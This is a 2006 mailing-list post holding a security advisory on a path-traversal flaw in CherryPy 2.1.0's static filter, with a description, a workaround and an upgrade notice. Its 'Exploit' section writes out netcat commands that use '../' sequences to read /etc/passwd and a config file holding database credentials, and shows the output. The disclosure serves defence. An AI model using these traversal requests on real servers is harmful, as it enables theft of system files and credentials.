On 1/10/06, Kevin Dangoor <[EMAIL PROTECTED]> wrote: > > I have just released TurboGears 0.8.8. The only change from 0.8.7 is > the requirement of CherryPy 2.1.1. > > The staticfilter of CherryPy 2.1.0 has a serious security flaw that > would allow people to retrieve files from "..". You should update as > soon as possible:
Now that this is out in the open, I might just as well release the security advisory I've sent to Remi Delon. Perhaps this will convince people they *really need to upgrade!* Security Advisory From: Ivo van der Wijk / m3r consultancy B.V. Subject: Security flaw in CherryPy 2.1.0 (and other versions) allows read-access to files on server outside configured directory Date: 2006/01/07 Synopsis -------- CherryPy is an object-oriented web development framework written in Python. An flaw in CherryPy 2.1.0 staticfilter.py exists that allows read-access to any file on the server accessible by CherryPy, including configuration files, sourcecode for the webapplication using CherryPy, logfiles, and so on. Description ------------ CherryPy's static filter allows access to static content (i.e. javascript, css). It's configured using CherryPy's configuration, and should only allow access to files *under* that specific directory. I.e. the following configuration: [/static] staticFilter.on = True staticFilter.dir = "static" Will make all files in "static", relative to the root module package available, i.e. assuming the webapp is located in /srv/webapp/app1, the files available under /srv/webapp/app1/static/ will be served as static files outside of CherryPy's default publishing scheme. However, the filter does not check if the path contains any ".." path components that might escape out of this directory, nor does cherrypy.lib.cptools.serveFile which is responsible for reading the file. Version 2.1.0 has been found vulnerable, earlier versions are most likely vulnerable as well. Exploit ------- The following exploit will escape out of the static directory by inserting sufficient .. path components and will retrieve /etc/password [EMAIL PROTECTED]:~$ (echo 'GET /static/../../../../../../../../../../../etc/passwd HTTP/1.0';echo) | nc localhost 8080 HTTP/1.0 200 OK Date: Sat, 07 Jan 2006 15:15:25 GMT Server: CherryPy/2.1.0 Content-Length: 1617 Content-Type: text/plain Last-Modified: Sun, 18 Dec 2005 16:50:04 GMT root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh (...) The following exploit will retrieve the TurboGears dev.cfg file containing (for example) database configuration: [EMAIL PROTECTED]:~$ (echo 'GET /static/../../dev.cfg HTTP/1.0';echo) | nc localhost 8080 (...) sqlobject.dburi="postgres://username:[EMAIL PROTECTED]/database" (...) Workaround ---------- Disable the static filter using staticFilter.on = False in your CherryPy configuration Or upgrade to CherryPy 2.1.1 Contact ------- For further information about this report, please contact: Ivo van der Wijk / m3r consultancy B.V. e-mail: ivo <at> m3r.nl phone: +31-20-7173155 -- Drs. I.R. van der Wijk / m3r Consultancy B.V. Linux/Python/Zope/Plone and Open Source solutions PO-box 51091, 1007 EB Amsterdam, The Netherlands Email: ivo <at> m3r.nl
